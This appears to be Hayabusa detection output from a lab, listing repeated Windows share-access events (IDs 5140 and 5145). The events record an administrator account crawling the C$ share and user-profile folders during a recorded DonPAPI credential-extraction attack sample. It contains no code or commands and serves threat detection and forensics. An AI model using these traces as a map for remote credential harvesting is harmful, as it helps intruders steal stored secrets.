+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
